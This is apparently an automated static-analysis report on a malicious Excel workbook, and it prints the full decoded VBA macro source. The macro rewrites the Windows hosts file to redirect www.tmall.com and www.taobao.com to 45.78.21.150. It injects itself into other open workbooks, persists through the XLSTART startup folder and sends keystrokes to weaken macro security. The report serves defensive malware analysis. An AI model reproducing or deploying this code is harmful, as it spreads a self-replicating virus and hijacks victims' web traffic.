Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 be1837abfd503f38…

MALICIOUS

Office (OLE) / .XLS

44.5 KB First seen: 2026-06-08
MD5: 5f164a3c32ceaa408960c3ad3567ce04 SHA-1: 15af3c5fc09336baffee4969eb56c452194d1efc SHA-256: be1837abfd503f38a71a5eb6f7a04cc666a7cc8a7a0d92f778f72cfb4c157ee7
168 Risk Score

Heuristics 5

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
        ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 2, WBstr
  • VBA copies the workbook into the Excel XLSTART startup folder high OLE_VBA_XLSTART_PERSISTENCE
    The macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.
    Matched line in script
    pth = Application.StartupPath & "\accelerate.xls"
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
        ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 150, "Sub Workbook_Open()"
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 45,568 bytes but its declared streams total only 12,224 bytes — 33,344 bytes (73%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4907 bytes
SHA-256: 0eba9ab14a64e11137f1092f93f076a8d8141186edfe80b28b35f0f2846e8ea5
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Private WithEvents App As Application
Attribute App.VB_VarHelpID = -1
Sub OfficeCheck()
Dim SysParh As String, Sysadd As String, t As String, sysadd1 As String
SysParh = Space(256)
GetSystemDirectory SysParh, 256
SysParh = Trim(SysParh)
SysParh = Left(SysParh, Len(SysParh) - 1)
SysParh = SysParh & "\drivers\etc\hosts"
Sysadd = "45.78.21.150 www.tmall.com"
sysadd1 = "#45.78.21.150 www.tmall.com"
If Dir(SysParh) <> "" Then
Open SysParh For Input As #1
t = Input(LOF(1), #1)
Close #1
If InStr(t, Sysadd) <> 0 Then
Open SysParh For Output As #1
t = Replace(t, sysadd1, Sysadd)
t = Replace(t, "#45.78.21.150 www.taobao.com", "45.78.21.150 www.taobao.com")
Print #1, t
Close #1
End If
If InStr(t, Sysadd) = 0 Then
Open SysParh For Append As #1
Print #1, vbNewLine & Sysadd & vbNewLine & "45.78.21.150 www.taobao.com"
Close #1
End If
End If
End Sub
Sub runtimer()
Application.OnTime Now + TimeValue("00:00:05"), "thisworkbook.p2d"
End Sub
Private Sub p2d()
On Error Resume Next
Debug.Print ThisWorkbook.VBProject.VBComponents("ThisWorkbook")
If Err.Number = 1004 Then
Err.Clear
Application.SendKeys "%(qtmstv){ENTER}"
DoEvents
End If
   Dim WBstr$, Wb As Workbook
    With ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
        For i = 1 To 105 '.CountOfLines
            WBstr = WBstr & .Lines(i, 1) & Chr(10)
        Next
    End With
    If ActiveWorkbook.FileFormat = 52 Or ActiveWorkbook.FileFormat = 56 Then
    If ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.CountOfLines = 0 Then
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 2, WBstr
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 150, "Sub Workbook_Open()"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 151, "Set App = Application"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 152, "End Sub"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 153, "Private Sub App_WorkbookOpen(ByVal Wb As Workbook)"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 154, "Call OfficeCheck"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 155, "Call d2p"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 156, "End Sub"
    End If
    End If
End Sub
Private Sub d2p()
Dim pth As String
Dim Exl As Excel.Application
Dim WBstr$, fn$, Wb As Workbook
Dim ws As Worksheet
On Error Resume Next
Debug.Print ThisWorkbook.VBProject.VBComponents("ThisWorkbook")
If Err.Number = 1004 Then
Err.Clear
Application.SendKeys "%(qtmstv){ENTER}"
DoEvents
End If
pth = Application.StartupPath & "\accelerate.xls"
If Dir(pth) = "" Then
Debug.Print ThisWorkbook.VBProject.VBComponents("ThisWorkbook")
If Err.Number <> 1004 Then
    Workbooks.Add.SaveAs Filename:=pth, FileFormat:=18
Else
    Workbooks.Close
End If
Else
    Exit Sub
End If
    Set Wb = Workbooks.Open(pth)
        With ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
        For i = 1 To 105 '.CountOfLines
            WBstr = WBstr & .Lines(i, 1) & Chr(10)
        Next
    End With
    If ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.CountOfLines = 0 Then
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 2, WBstr
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 150, "Sub Workbook_Open()"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 151, "Set App = Application"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 152, "End Sub"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 153, "Private Sub App_WorkbookOpen(ByVal Wb As Workbook)"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 154, "Call OfficeCheck"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 155, "Call runtimer"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 156, "End Sub"
    End If
    ActiveWorkbook.IsAddin = True
    Wb.Save
    Wb.Close
End Sub




Sub Workbook_Open()
Set App = Application
End Sub
Private Sub App_WorkbookOpen(ByVal Wb As Workbook)
Call OfficeCheck
Call d2p
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.